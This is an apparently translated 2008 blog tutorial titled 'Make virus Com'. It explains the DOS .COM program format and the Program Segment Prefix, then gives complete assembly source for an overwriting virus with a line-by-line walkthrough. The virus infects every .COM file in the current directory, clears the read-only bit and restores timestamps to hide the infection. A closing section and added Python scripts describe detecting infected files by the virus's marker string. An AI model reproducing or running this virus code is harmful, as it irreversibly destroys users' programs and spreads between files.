Saturday, December 27, 2008

Make virus Com

You have surely written a normal program in assembly language that produces an executable with the .COM extension. To make the rest easier to follow, here is the basic format of a .COM program:

.Model Small
.Code
Org 100h
Label1: Jmp Label2
Dataku db "Program Data Com$"   ; text to print; AH=09h needs the "$" terminator
Label2:
  Mov AH, 09h                   ; DOS: print string at DS:DX
  Lea DX, Dataku
  Int 21h
  Int 20h                       ; terminate program
End Label1



Looking at a normal .COM program, you will always see the directive Org 100h. It tells the assembler that when the operating system loads the program, the first 100h (256) bytes of the segment are left empty; in other words, the code of our .COM program starts at offset 100h. Why reserve these 100h bytes? Because the operating system fills them with the Program Segment Prefix (PSP), which it builds in order to manage the program we are running.

Program Segment Prefix (PSP)

The Program Segment Prefix, usually shortened to PSP, is a holdover from the CP/M era. It occupies 100h (256) bytes and stores all the information needed to run the program. Its structure, by offset, is:
Offset  Size       Contents
00h     2 bytes    INT 20h instruction
02h     1 word     Segment address of the memory provided for the program
04h     1 byte     Reserved
05h     5 bytes    Address of the INT 21h dispatcher
0Ah     2 words    INT 22h vector
0Eh     2 words    INT 23h vector
12h     2 words    INT 24h vector
16h     22 bytes   Reserved
2Ch     1 word     Segment address of the environment
2Eh     46 bytes   Reserved
5Ch     16 bytes   FCB1
6Ch     16 bytes   FCB2
80h     1 byte     Length of the command line
81h     127 bytes  Command line
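As an added example (not code from the original post), the following Python builds a constructed 256-byte PSP image from the layout in the table and decodes it back into named fields. The sample values (memory top 9FFFh, environment segment 0A32h, the command line) are assumptions chosen for illustration, not captured from a real DOS session.

```python
import struct

def build_sample_psp(command_tail=" /A FILE.TXT", env_seg=0x0A32, mem_top=0x9FFF):
    """Constructed 256-byte PSP image (assumed values, not a real DOS capture)."""
    psp = bytearray(0x100)
    psp[0x00:0x02] = b"\xCD\x20"                # offset 00h: INT 20h instruction
    struct.pack_into("<H", psp, 0x02, mem_top)  # offset 02h: top-of-memory segment
    struct.pack_into("<H", psp, 0x2C, env_seg)  # offset 2Ch: environment segment
    tail = command_tail.encode("ascii")
    if len(tail) > 126:                          # 81h..FFh holds 126 chars + CR
        raise ValueError("command line longer than 126 bytes")
    psp[0x80] = len(tail)                       # offset 80h: command-line length
    psp[0x81:0x81 + len(tail)] = tail           # offset 81h: command-line text
    psp[0x81 + len(tail)] = 0x0D                # DOS ends the text with a CR
    return bytes(psp)

def parse_psp(buf):
    """Decode a PSP image into the fields listed in the table above."""
    if len(buf) != 0x100:
        raise ValueError("a PSP is exactly 100h (256) bytes")
    tail_len = buf[0x80]
    if tail_len > 126:
        raise ValueError("corrupt PSP: command-line length %d" % tail_len)
    return {
        "exit_stub_is_int20": buf[0x00:0x02] == b"\xCD\x20",
        "mem_top_seg": struct.unpack_from("<H", buf, 0x02)[0],
        "env_seg": struct.unpack_from("<H", buf, 0x2C)[0],
        "fcb1": bytes(buf[0x5C:0x6C]),
        "fcb2": bytes(buf[0x6C:0x7C]),
        "command_line": buf[0x81:0x81 + tail_len].decode("ascii", "replace"),
    }

if __name__ == "__main__":
    for key, value in parse_psp(build_sample_psp()).items():
        print("%-20s %r" % (key, value))
```

The region from 80h onward is also where DOS places the default Disk Transfer Area, which is why the virus listing later in this post can address the file name returned by the find-first call as offset 9Eh (80h plus the 1Eh-byte offset of the name inside the DTA record).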
Making Virus 001

This first virus attacks every program with the .COM extension: it searches the active directory for all *.COM files and infects each one. An infected program can no longer run normally, because the original program has been overwritten by the virus code. This is a non-resident virus.

; Note:
; The virus overwrites and destroys the program it infects. It spreads only
; within the active directory. It is not resident and is the simplest kind of virus.
.Model Small
.Code
Org 100h
V_Length equ Last-Start
Start label near            ; start of the virus
  mov ah, 4Eh               ; find first file
  mov dx, offset Filename   ; ds:dx -> ASCIIZ "*.com"
  int 21h
Back:
  mov ah, 43h               ; get file attributes
  mov al, 0                 ; (same as above)
  mov dx, 9Eh               ; name of the .COM file found, inside the DTA
  int 21h
  mov ah, 43h               ; set attributes of the file found
  mov al, 01                ; (same as above)
  and cx, 11111110b         ; clear the read-only bit
  int 21h
  mov ax, 3D01h             ; open file for write only
  mov dx, 9Eh               ; file name in the DTA
  int 21h
  mov bx, ax                ; bx = file handle
  mov ah, 57h               ; get file date and time
  mov al, 0                 ; (same as above)
  int 21h
  push cx                   ; save time
  push dx                   ; save date
  mov dx, 100h              ; start of the virus data
  mov cx, V_Length          ; length of the virus
  mov ah, 40h               ; write the virus into the file
  int 21h
  pop dx                    ; restore date
  pop cx                    ; restore time
  mov ah, 57h               ; set file date and
  mov al, 01h               ; time
  int 21h
  mov ah, 3Eh               ; close file
  int 21h
  mov ah, 4Fh               ; find next file
  int 21h
  jnc Back                  ; if found, jump back
  mov ah, 9h                ; display message
  mov dx, offset Data       ; data to screen
  int 21h
Done: int 20h               ; terminate program
Filename db "*.com", 0
Data db "Files On Past Direktory this virus fell ill Overall $"
Last label near
end Start

How the virus works:
.Model Small
.Code
Org 100h
V_Length equ Last-Start
Start label near            ; start of the virus

This is the beginning of the virus program. The symbol V_Length computes the length (size) of the virus program. Knowing the size of the virus we have written, we can copy it into another program.
  mov ah, 4Eh               ; find first file
  mov dx, offset Filename   ; ds:dx -> ASCIIZ "*.com"
  int 21h

First, look for the program to be infected, using the DOS find-first function; the dx register points at the file name to search for. This search only finds "*.com" files in the active directory, so "*.com" programs in other directories will not be infected.
Back:
  mov ah, 43h               ; get file attributes
  mov al, 0                 ; (same as above)
  mov dx, 9Eh               ; name of the .COM file found, inside the DTA
  int 21h
  mov ah, 43h               ; set attributes of the file found
  mov al, 01                ; (same as above)
  and cx, 11111110b         ; clear the read-only bit
  int 21h

After a file has been found, read its attributes, so that our write is not blocked by a file that carries the read-only attribute. Then, with a logical AND, clear the read-only attribute of the file that was found so that we can write to it.
  mov ax, 3D01h             ; open file for write only
  mov dx, 9Eh               ; file name in the DTA
  int 21h
  mov bx, ax                ; bx = file handle
  mov ah, 57h               ; get file date and time
  mov al, 0                 ; (same as above)
  int 21h
  push cx                   ; save time
  push dx                   ; save date

Once the read-only attribute has been cleared, open the file for writing so that the virus can be written into it, which is the infection itself. When the file is open, store its handle in register bx. Next, get the date and time of the opened file and save them.
  mov dx, 100h              ; start of the virus data
  mov cx, V_Length          ; length of the virus
  mov ah, 40h               ; write the virus into the file
  int 21h
  pop dx                    ; restore date
  pop cx                    ; restore time
  mov ah, 57h               ; set file date and
  mov al, 01h               ; time
  int 21h
  mov ah, 3Eh               ; close file
  int 21h

A program with the .COM extension always starts at offset 100h (256 bytes), the space reserved for the PSP. Because this first virus is itself a .COM program, to copy it into the file that was found we start copying from offset 100h, for as many bytes as the virus is long.
After that, set the file's date and time back to the values saved earlier, so that the date and time of the infected program appear unchanged. Finally, the infection is complete and the file is closed.
  mov ah, 4Fh               ; find next file
  int 21h
  jnc Back                  ; if found, jump back

After the first file has been infected, search for the next file with the same extension. If one is found, infect it in the same way as described above.
  mov ah, 9h                ; display message
  mov dx, offset Data       ; data to screen
  int 21h
Done: int 20h               ; terminate program
Filename db "*.com", 0
Data db "Files On Past Direktory this virus fell ill Overall $"
Last label near
end Start

After the last file in the active directory has been infected, display the message "Files On Past Direktory this virus fell ill Overall" on the screen.

Preventing and killing Virus 001

From Virus 001 you can see that this is a destructive virus: programs that have been infected cannot be repaired. So the only way to eradicate it is to delete every .COM program it has infected. You can check whether a program is infected by looking for the string "Files On Past Direktory this virus fell ill Overall" inside it; if the string is present, delete the file. An easy way to search for the string is the "Type" command from DOS; you can also use the "Find" command from DOS to search for it.
From this first example you can see that, by understanding how a virus works, you can eradicate it without any programming at all. Ordinary programs installed with DOS, such as find.exe, can serve as tools to detect and eradicate the virus.
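The same check, as an added Python example that is not part of the original post: a scanner that reads every .COM file in a directory and flags those containing the marker string the listing above writes into each file it overwrites. File date and time are deliberately not used as a signal, because the virus restores the original values after writing. The sample directory, file names and byte contents are constructed fixtures (the "sick" files hold only padding plus the marker, no real code).

```python
import os
import tempfile

# Marker written into every overwritten file by the listing above; the same
# string the post suggests searching for with TYPE or FIND.
MARKER = b"Files On Past Direktory this virus fell ill Overall $"

def scan_com_files(directory):
    """Return the sorted names of .COM files in `directory` that contain MARKER."""
    flagged = []
    for name in os.listdir(directory):
        if not name.lower().endswith(".com"):
            continue  # the virus only touches *.COM files in the active directory
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        if MARKER in data:
            flagged.append(name)
    return sorted(flagged)

def make_sample_dir():
    """Constructed fixture: clean .COM files, marked .COM files, one non-.COM file."""
    d = tempfile.mkdtemp(prefix="comscan_")
    samples = {
        "CLEAN1.COM": b"\xB4\x09\xBA\x00\x01\xCD\x21\xCD\x20Hello$",  # tiny hello-style stub
        "CLEAN2.COM": b"\xCD\x20",                                    # just INT 20h
        "SICK1.COM":  b"\xEB\x10" + b"\x90" * 40 + MARKER + b"\x00",  # padding + marker
        "SICK2.COM":  b"\x90" * 3 + MARKER,                           # padding + marker
        "README.TXT": MARKER,                                         # not .COM: ignored
    }
    for name, blob in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(blob)
    return d

if __name__ == "__main__":
    sample = make_sample_dir()
    for name in scan_com_files(sample):
        print("infected:", os.path.join(sample, name))
```

Run it against a directory of your own to list the files the post says must be deleted; the string match is exactly what find.exe does, only applied to every .COM file in one pass.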
Learn More... Assembly Language for Intel-Based Computers (5th Edition)

Source: http://sahammudien.wordpress.com/2007/12/12/make-virus-com/
